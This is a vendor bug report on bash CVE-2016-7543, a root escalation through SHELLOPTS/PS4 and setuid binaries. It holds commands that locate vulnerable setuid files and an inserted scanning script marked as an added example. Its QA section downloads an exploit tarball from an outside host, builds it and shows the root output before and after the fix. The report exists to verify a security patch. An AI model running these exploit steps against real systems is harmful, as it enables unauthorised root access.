Univention Bugzilla – Bug 42874
bash: Multiple issues (4.1)
Last modified: 2016-12-01 11:57:27 CET
Upstream Debian package version 4.2+dfsg-0.1+deb7u4 fixes this issue:

* Specially crafted SHELLOPTS+PS4 environment variables in combination with insecure setuid binaries using system()/popen() can result in root privilege escalation (CVE-2016-7543)

UCS users use bash as default login shell, but it looks like there are no vulnerable SUID binaries in a standard installation:

    find / -perm -4000 -type f -exec objdump -T {} \; 2>/dev/null \
      | egrep '\<popen|system\>'
    /usr/lib/vmware/bin/vmware-vmx-stats
    /usr/lib/vmware/bin/vmware-vmx-debug
    /usr/lib/vmware/bin/vmware-vmx
    /usr/bin/vmware-mount
    /usr/sbin/vmware-authd
    /sbin/mount.cifs

To show the infected binaries:

    find / -perm -4000 -type f -exec sh -c 'objdump -T {} | egrep -q "\<popen|system\>"' \; -fprint /dev/stdout
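An added example, not part of the bug report or of Univention's tooling: a shell version of the check discussed above that lists setuid files importing system() or popen(), extended here to setgid files as well. It counts only undefined (imported) symbols and compares the name in each objdump -T row exactly, so names that merely begin with popen or end with system are not reported; the function names and the sample rows are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag setuid/setgid ELF files that import system() or popen().

# Read `objdump -T` output on stdin and print each imported (undefined) symbol
# whose name is exactly system or popen. Exit status is 0 if any was found.
spawn_imports() {
    awk '
        # Symbol rows: the section is a field of its own, the name is the last field.
        {
            und = 0
            for (i = 1; i < NF; i++) if ($i == "*UND*") und = 1
            if (und && ($NF == "system" || $NF == "popen")) { print $NF; hit = 1 }
        }
        END { exit (hit ? 0 : 1) }
    '
}

# Walk a directory tree (default /) and list privileged files with such imports.
scan_privileged() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        syms=$(objdump -T "$f" 2>/dev/null | spawn_imports | sort -u | tr '\n' ' ')
        if [ -n "$syms" ]; then
            printf '%s: %s\n' "$f" "$syms"
        fi
    done
    return 0
}

# Constructed objdump -T rows for illustration (not taken from the bug report).
SAMPLE_HIT='0000000000000000      DF *UND*  0000000000000000  GLIBC_2.2.5 system
0000000000000000      DF *UND*  0000000000000000  GLIBC_2.2.5 setuid'
SAMPLE_MISS='0000000000000000      DF *UND*  0000000000000000  Base        popen_helper
0000000000001139 g    DF .text  0000000000000016  Base        my_system'
```

Run `scan_privileged /` as root so that every file can be read; an import of system() or popen() marks a binary for review of how it handles its environment, not as vulnerable by itself.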
OK: *** 4.2+dfsg-0.1.51.201611101755 0
        500 http://omar.knut.univention.de/build2/ ucs_4.1-0-errata4.1-4/amd64/ Packages
OK: zgrep CVE-2016-7543 /usr/share/doc/bash/changelog.Debian.gz
OK: YAML
OK: bash still works

I could not reproduce it with this exploit: http://seclists.org/oss-sec/2016/q3/617
Created attachment 8255
exploit.tar.gz

OK: reproduce

    # cd /tmp/
    # wget http://apt.inguza.net/wheezy-security/bash/exploit.tar.gz
    # tar xvzf exploit.tar.gz
    # make
    # make root
    # ln -sf bash /bin/sh
    # su Administrator bash
    $ cd /tmp/; make test
    Test 1
    uid=0(root) gid=5000(Domain Admins) groups=0(root),1005(Windows Hosts),5000(Domain Admins),5001(Dom/bin/date
    Tue Nov 29 19:17:07 CET 2016
    Test 2
    uid=33(www-data) gid=5000(Domain Admins) groups=33(www-data),1005(Windows Hosts),5000(Domain Admins/bin/date
    Tue Nov 29 19:17:07 CET 2016
    Test 3
    uid=2002(Administrator) gid=5000(Domain Admins) groups=5000(Domain Admins),1005(Windows Hosts),5001/bin/date

~OK: fixed version:

    ls -l exploit1 exploit2 exploit3
    -rwsr-xr-x 1 root root 6920 Nov 29 19:12 exploit1
    -rwsr-xr-x 1 root root 6920 Nov 29 19:12 exploit2
    -rwxr-xr-x 1 www-data root 6804 Nov 29 19:12 exploit3
    ./test.sh
    Test 1
    + /bin/date
    Tue Nov 29 19:27:31 CET 2016
    Test 2
    uid=33(www-data) gid=5000(Domain Admins) groups=33(www-data),1005(Windows Hosts),5000(Domain Admins/bin/date
    Tue Nov 29 19:27:31 CET 2016
    Test 3
    uid=2002(Administrator) gid=5000(Domain Admins) groups=5000(Domain Admins),1005(Windows Hosts),5001/bin/date
    Tue Nov 29 19:27:31 CET 2016

I still think that it is wrong that the code is executed in Test 2 and Test 3. In "Test 2" the code is executed as www-data. But well, the most critical thing is fixed.
<http://errata.software-univention.de/ucs/4.1/343.html>